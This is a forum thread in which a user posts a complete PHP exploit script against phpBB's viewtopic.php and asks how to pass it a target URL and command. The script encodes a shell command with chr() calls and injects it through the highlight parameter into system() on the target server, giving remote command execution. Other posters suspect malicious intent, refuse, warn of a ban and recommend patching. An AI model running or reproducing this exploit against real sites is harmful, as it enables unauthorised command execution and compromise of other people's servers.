perl/php

[theboywhogotlost]

I have this code however I have no idea where to put the varibles.
Could somone explain to me where to put the varibles?
this is the top of the script.


if ($argv[2]){
$url = $argv[1];
$jj = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <jj> [topic id] [man]\n\n";
echo "\tURL\t URL to site (ex: http://127.0.0.1/html)\n";
echo "\tjj\t jj to run\n";
echo "\ttop_id\t top id\n";
echo "\tman\t man\n";
exit;
}
if ($argv[3])
$top = $argv[3];

if ($argv[4])
$man = $argv[4];

---

If you are looking for help scripting an malicious exploit, look elsewhere.

AnandTech Moderator

 

[Crusty]

I don't understand your question. What is your script trying to do?

 

[theboywhogotlost]

# heres the whole script


#!/usr/bin/php -q
<?php


if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}


if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;

if ($argv[4])
$proxy = $argv[4];


$cmd = str2chr($command);

$action = "/viewtopic.php?t=$topic&amp;highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

function str2chr($str){

for($i = 0;$i < strlen($str);$i++){
$chr .= "chr(".ord($str{$i}).")";
if ($i != strlen($str) -1)
$chr .= "%252e";
}
return $chr;
}
?>

 

[igowerf]

What do you mean? Which variables? What are you trying to do?

 

[theboywhogotlost]

Perhaps this will help

http://www.lostcoders.net/index-single-470.htm

 

[mugs]

You're going to have to explain what exactly you mean by this:

Could somone explain to me where to put the varibles?

I'd love to help, but your question makes no sense.

If you're asking where $argv[0], etc come from, it's the command line string you use to run the script. So in the case of "script.php http://forums.anandtech.com", $argv[0] would be script.php and $argv[1] would be http://www.anandtech.com.

If that's not what you're asking, ask it better. Ask it in a way that someone who can't read your mind could interpret it.

 

[igowerf]

Originally posted by: theboywhogotlost
Perhaps this will help

http://www.lostcoders.net/index-single-470.htm

So you're a script kiddie trying to exploit a security hole, but you can't understand the code?

 

[theboywhogotlost]

Yeah Mugs thats what i mean I guess could you explain it some more?

Do you mean i would type "http://forums.anandtech.com" in the command line?

 

[LeetViet]

Originally posted by: igowerf

Originally posted by: theboywhogotlost
Perhaps this will help

http://www.lostcoders.net/index-single-470.htm

So you're a script kiddie trying to exploit a security hole, but you can't understand the code?

:Q

 

[UCJefe]

If you're asking how to run the script and what arguments to pass in, there is help built right into the script you posted explaining all the arguments. If that's not what you're asking then I have no idea what you are talking about.

I hope you are planning on running this against your own servers to test their vulnerability. Anything else and I smell a ban.

 

[skyking]

That makes no sense. If you have a vulnerable version, you just patch it. End of story. I would not be
asking for help to understand a hack or exploit here.

 

[mugs]

Originally posted by: igowerf

Originally posted by: theboywhogotlost
Perhaps this will help

http://www.lostcoders.net/index-single-470.htm

So you're a script kiddie trying to exploit a security hole, but you can't understand the code?

Woah, didn't even read that. I think the OP has some 'splainin to do.